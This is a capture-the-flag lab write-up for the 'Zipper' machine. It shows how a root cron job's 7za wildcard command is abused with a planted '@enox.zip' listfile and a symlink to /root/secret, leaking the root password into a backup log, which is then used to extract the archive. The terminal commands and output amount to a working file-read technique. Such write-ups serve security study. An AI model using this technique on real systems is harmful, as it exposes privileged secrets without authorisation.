Cron
There is a system-wide cronjob executing a command; bash /opt/backup.sh
This was enumerated by PEAS as well
www-data@zipper:/opt$ ll
total 16K
4.0K drwxr-xr-x 2 root root 4.0K Apr 6 14:12 backups
4.0K drwxr-xr-x 3 root root 4.0K Aug 12 2021 .
4.0K -rwxr-xr-x 1 root root 153 Aug 12 2021 backup.sh
4.0K drwxr-xr-x 20 root root 4.0K Aug 12 2021 ..
www-data@zipper:/opt$ cat backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.logThe backup.sh script archives all the ZIP files in the /var/www/html/uploads directory using 7za with a password; /root/secret
The script also stores the command output to /opt/backups/backup.log file
The issue lies in the wildcard bit, *.zip
Vulnerabilities
/Practice/Zipper/4-Post_Enumeration/attachments/{23EFA26D-A793-448A-A550-30E69CAC6BA4}.png)
According to an online resource, the wildcard bit, *, used in 7z(7za) can be abused to perform arbitrary file read.
Moving on to the privilege escalation phase
/var/www/html/uploads
www-data@zipper:/opt$ ll /var/www/html/uploads
ll /var/www/html/uploads
total 20K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Apr 6 14:52 .
4.0K -rw-r--r-- 1 www-data www-data 2.7K Apr 6 14:51 upload_1743951079.zip
0 lrwxrwxrwx 1 www-data www-data 12 Aug 12 2021 enox.zip -> /root/secret
0 -rw-r--r-- 1 www-data www-data 0 Aug 12 2021 @enox.zip
4.0K -rw-r--r-- 1 www-data www-data 156 Aug 12 2021 upload_1628773085.zip
4.0K drwxr-xr-x 3 www-data www-data 4.0K Aug 12 2021 ..
4.0K -rw-r--r-- 1 www-data www-data 32 Aug 12 2021 .htaccessChecking the /var/www/html/uploads directory reveals 2 interesting files;
@enox.zipenox.zip
It would appear that there has been an exploit attempt.
/Practice/Zipper/4-Post_Enumeration/attachments/{195EF871-361D-4238-9741-CAC34AA27E83}.png)
Checking the official documentation of 7z reveals that the @listfile feature, @, is used to indicate a listfile that includes multiple files defined within the @listfile.
This would mean that when 7za is execute, it will treat enox.zip as a file containing the list of files, indicated by the @enox.zip file, it should compress and when it 7za read enox.zip it will read /root/secret and as the content of this file isn’t a list of files, it will throw and error showing the content in the log.
/opt/backups/backup.log
www-data@zipper:/opt$ cat backups/backup.log
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 3327
Scanning the drive:
3 files, 2875 bytes (3 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 3
Files read from disk: 3
Archive size: 3327 bytes (4 KiB)
Scan WARNINGS for files and folders:
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1Checking the /opt/backups/backup.log file shows that 7za attempted to perform scanning invoked by the @listfile; @enox.zip
/Practice/Zipper/4-Post_Enumeration/attachments/{9CC0845E-CE09-4437-81CA-ADBD80683BB8}.png)
This line is particularly interesting because this appears to be meant to be enox.zip : No Moree Files
But instead it read the /root/secret file as enox.zip file is a symlink to the /root/secret file
This would mean that WildCardsGoingWild might be the content of the /root/secret file
Validation
www-data@zipper:/var/tmp$ cp /opt/backups/backup.zip .
www-data@zipper:/var/tmp$ 7za x ./backup.zip -pWildCardsGoingWild
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=C.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3327 bytes (4 KiB)
Extracting archive: ./backup.zip
--
Path = ./backup.zip
Type = zip
Physical Size = 3327
Everything is Ok
Files: 3
Size: 2868
Compressed: 3327
www-data@zipper:/var/tmp$ ll
total 24K
4.0K drwxrwxrwt 2 root root 4.0K Apr 6 15:11 .
4.0K -rw-r--r-- 1 www-data www-data 3.3K Apr 6 15:11 backup.zip
4.0K -rw-r--r-- 1 www-data www-data 2.7K Apr 6 14:51 upload_1743951079.zip
4.0K -rw-r--r-- 1 www-data www-data 156 Aug 12 2021 upload_1628773085.zip
4.0K -rwx------ 1 www-data www-data 12 Aug 12 2021 enox.zip
4.0K drwxr-xr-x 14 root root 4.0K Aug 12 2021 ..It successfully extracted the content with the password; WildCardsGoingWild